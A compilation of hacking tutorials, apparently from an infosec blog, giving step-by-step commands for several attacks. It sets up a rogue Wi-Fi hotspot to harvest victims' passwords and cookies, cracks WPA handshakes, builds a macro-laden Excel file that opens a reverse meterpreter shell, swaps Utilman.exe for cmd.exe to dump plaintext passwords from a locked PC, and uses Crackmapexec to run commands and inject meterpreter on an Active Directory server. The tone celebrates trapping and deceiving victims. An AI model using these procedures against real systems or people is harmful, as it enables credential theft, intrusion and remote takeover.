Hack Password using Rogue Wi-Fi Access Point Attack (WiFi-Pumpkin)

WiFi-Pumpkin framework for Rogue Wi-Fi Access Point Attack It helps a hacker to create a free open fake wifi and as soon as victim connects to the fake open wifi, he gets trapped. However, the best feature is that if your internet connection is working, victim will get access to internet. Hence, more chances of him to get trapped(Nice, isn’t it?).

First, to install Wifi-Pumpkin we type on terminal:

>git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git

Once the cloning is done, we need to install. Hence, go to the installed directory of WiFi-Pumpkin and open it in terminal and type the following command to install it:

./installer.sh --install

Now, open the installed directory of wifi-pumpkin in terminal and type:

python wifi-pumpkin.py

It will load wifi pumpkin in GUI as you can see in the screenshot below.

Now, all you have to do is configure your settings and click on ‘Start Access Point’.

Wait for some devices to connect. They will be displayed as you can see below. A good thing is that devices are automatically assigned a class A IP address.

In the victim’s phone PumpAP is created and he/she is accessing the internet without even knowing that they have fallen into the sweet trap of free internet!

While the victim is acessing Wi-Fi like usual, we can see his/her activity. As you can see in the below screenshot that we are able to capture victim’s phone’s “Hike Contacts.”

As soon as victim opens anyone’s profile on hike, their number is being captured by us!

Many other notable features include cookie capturing. As n the below screenshot, we can see victim’s device’s cookies being visible. Which is great to know as it may have something interesting?

We are also able to capture any credentials/ login id and password on any http website.

As you can see below that victim has logged in into way2sms.com and their ID and password are being recorded.

For even better case scenarios, when many of victims will be connected to your fake Wireless Network thinking they are in luck, we will be recording everything in clear text. If we are unable to see everything on terminal, don’t worry, WiFi-Pumpkin has stored everything category wise.

Now, we go to the directory:

/WiFi-Pumpkin/logs/AccessPoint

In that directory many log files are present that have captured numerous items. One such text file is “credentials.log”

Here, we will see all the login details.

Another notable file is the “urls.log”

We can see all the accessed urls on victim’s device, along with their IP address.

So, this is how you allure victims into free internet and steal data without even letting them know!

Wifi Penetration Testing using Gerix Wifi Cracker

GERIX WIFI CRACKER is a GUI wireless 802.11 penetration tools which uses the aircrack-ng method behind its point and click method to crack the wifi password.

First of all clone the github repo with command:

git clone https://github.com/J4r3tt/gerix-wifi-cracker-2.git

Now inside the installed directory give the gerix.py file permission to execute with command:

chmod +x gerix.py

and then start the gerix wifi cracker with command:

python gerix.py

Now a GUI window will appear, click on Reload the Wireless Interfaces and when the wireless interface appears click on it i.e. wlan0 in my case and then click on Enable/Disable Monitor Mode to enable the monitor mode from managed mode.

After enabling the monitor mode the wireless interface name will be changed to wlan0mon and the mode will be monitor .Now for scanning the wireless networks select the monitor mode interface (wlan0mon in my case) and then click on Rescan networks.

After scanning networks select you target by clicking on it as in my case i have selected tp link and then go to WPA tab (As the target AP is using WPA2 security).

After clicking on WPA tab, go to general functionalities and start sniffing and logging by clicking on it and a terminal window will appear capturing the packets of the target AP.    

Now without closing the terminal windows got to WPA attack section and click on Autoload victim clients who will load victim client MAC address to deauthenticate and now click on Client Deauthentication to disconnect the victim so that we can capture the handshake. 

Now as you can see WPA handshake is successfully captured and same can be seen in the top right corner of the terminal window. Now close the terminal window.

Now we have to crack the password from the captured file so got to Cracking tab and then to WPA bruteforce cracking section and give the dictionary path in the Add your dictionary field and then click on Aircrack-ng  -Crack WPA password .(you can also choose any other method for cracking like pyrite and rainbow tables)

As you can see it has successfully cracked the password.

Hack Remote PC using Microsoft Office Files (Macro Payloads)

Veil-Evasion is a powerful tool to generate payload executables that bypass common antivirus solutions.

To install veil-evasion on your kali linux, type :

>apt-get install veil-evasion

After the installation completes, run veil-evasion with the following command on terminal, in the installed directory of veil-evasion:

>veil-evasion

To see the options of payloads type

> list

We can see a menu of the available payloads to use. There are plenty of payloads to use.

We will be using the payload id-23. We type the command:

>use powershell/meterpreter/rev_https

Reverse https is used here just so in case if the victim's PC has a firewall enabled for TCP, considering the most common situations where HTTPS is not blocked on PC.

After that set local host(Your PC's IP). In my case it is 192.168.0.105. Hence:

>set lhost  192.168.0.105

And then generate the payload:

>generate

Enter the name of file. Let the name of file to be generated be raj. Therefore;

>raj

Now, the Veil-Evasion tool has created a bat file in powershell code in the directory:

/var/lib/veil-evasion/output/source/raj.bat

Open a new window of terminal and install MacroShop. MacroShop is a collection of scripts to aid in delivering payloads via Office Macros. Most are Python. To install it we type:

>git clone https://github.com/khr0x40sh/MacroShop.git

After the installation of MacroShop, open its installed folder and place the file "raj.bat" in that directory.

Once the file "raj.bat" is placed in MacroShop, change the terminal path to MacroShop(or right click on the installed directory and click open in terminal and type:

>python macro_safe.py raj.bat file.txt

Here file.txt is the name of output text file that MacroShop will create.

Now open windows->New Microsoft  Office Excel Worksheet->view(on the top bar)->macro

Enter the macro name->create

Then in the Macro editing area(or the workbook) copy paste the code present in "file.txt" to the workbook and save macro.

Now, edit the Microsoft excel worksheet so as to make it look authentic and edit it in such a way that the victim should definitely enable Macro option( given it is disabled).

Just for the case of simplicity and tutorial, I enter something random and save it as Microsoft Excel document 97-2003.

Open the excel document again, and enable macro option(if disabled).

Meanwhile, open metasploit on kali linux

msf>use exploit/multi/handler

msf exploit(handler)>set payload windows/meterpreter/reverse_https

msf exploit(handler)>set lhost 192.168.0.105

msf exploit(handler)>set lport 8443

msf exploit(handler)>exploit

As soon as victim clicks on enabling the macro and/or opens the excel document, Voila! We get the meterpreter session. Hence, job is done.

Hack Locked Workstation Password in Clear Text

For this tutorial we will be using kali Linux iso which can be found on their official website and wce(windows credentials editor) which can be found at 

http://www.ampliasecurity.com/research/windows-credentials-editor/

Download the universal version if you don’t know the target system architecture (32 bit or 64 bit).

Windows Credentials Editor (WCE) is a security tool to list logon sessions and add, change, list and delete associated credentials (ex.: LM/NT hashes, plaintext passwords and Kerberos tickets).

First of all make your pen drive bootable with kali linux (you can choose any other linux distro) and then copy the wce.exe to the pen drive and then boot up the kali linux with the PD on target system  and from the boot menu choose Live boot option and hit enter.

Now after OS boots up go to File Manager and browse to other locations and choose the 16 GB volume (size of the windows installation which will be different in your case).

Now browse to the Windows/System32 folder.

Now rename the Utilman.exe file to any other name and then rename the cmd.exe to Utilman.exe.

Now restart the system but this time doesn’t boot the system to kali Linux, let it boot to the installed windows and you will be presented with password screen after choosing the user.

At the password screen to lower left side a blue icon named ease of access will be present, click on it and a command windows will be opened

Now you have to execute the wce.exe file in the pd so type the following command to know the external devices connected:

diskpart  (a windows command line utility which enables us to manage disk and partitions)

and then on diskpart prompt type command:

list volume (show all the connected drives)

Now choose the FAT32 Fs type drive (to be sure also confirm the drive name with the size of your pen drive)

In my case it is F. Now exit the diskpart by pressing ctrl^c.

So now browse to the pd by typing the following command: f:  (Here f is the drive letter name In your case it could be different) and then execute the wce.exe file which you copied previously with command:

wce.exe –w (-w is used to dump all the passwords in clear text)

As you can see it has successfully dumped the password in clear text.

Penetration Testing in Windows/Active Directory with Crackmapexec

Crackmapexec is a swiss army knife for pentesting Windows/Active Directory environments. Active Directory (AD) is a directory service that Microsoft developed for Windows domain networks. It is included in most Windows Server operating systems as a set of processes and services.

First of all, to install crackmapexec run the following commands:

apt-get install -y libssl-dev libffi-dev python-dev build-essential

I have already installed all the requirements that is why because it is showing already installed but you have to install them.

Now we will create a virtual environment for  crackmapexec with virtualenvwrapper.

virtualenvwrapper is a set of extensions to virtualenv tool. The extensions include wrappers for creating and deleting virtual environments and otherwise managing your development workflow, making it easier to work on more than one project at a time without introducing conflicts in their dependencies.

apt-get install virtualenvwrapper

source /usr/share/virtualenvwrapper/virtualenvwrapper.sh

mkvirtualenv CME

pip install git+https://github.com/CoreSecurity/impacket

pip install crackmapexec







Now to execute a windows command remotely run the following command:

crackmapexec 192.168.0.104 –u administrator –p  ‘Igni*******’ –x whoami

As you can see the server is Pwned and the output of the command is rajlab\administrator.

Here 192.168.0.104 is the server IP running active directory service in the network.

We can also execute a powershell command:

crackmapexec 192.168.0.104 –u administrator –p  ‘Igni*******’ –X  ‘$PSVersionTable’

The command is executed successfully and the output can be seen as the version of the powershell.

If we don’t know the active directory server we can run crackmapexec on the whole network by giving the network range as in my case 192.168.0.0/24.

Now comes the turn to get a meterpreter shell , so start  metasploit with command msfconsole in a new terminal and set up the reverse handler :

use exploit/multi/handler

set payload windows/meterpreter/reverse_https

set lhost 192.168.0.132

set lport 444

exploit

Now on the previous terminal run command:

crackmapexec 192.168.0.104 -u administrator -p  Ign******* -M metinject –o LHOST=192.168.0.132 LPORT=444

As you can see payload is executed successfully and a powershell script Invoke-Shellcode.ps1 is executed to gets the reverse meterpreter shell using the metinject module to directly inject meterpreter into memory.

Here –M is the Module to use.

As you can see we got the meterpreter shell.

Author: Himanshu Gupta is an InfoSec Researcher | Technical writer. You can follow him on LinkedIn .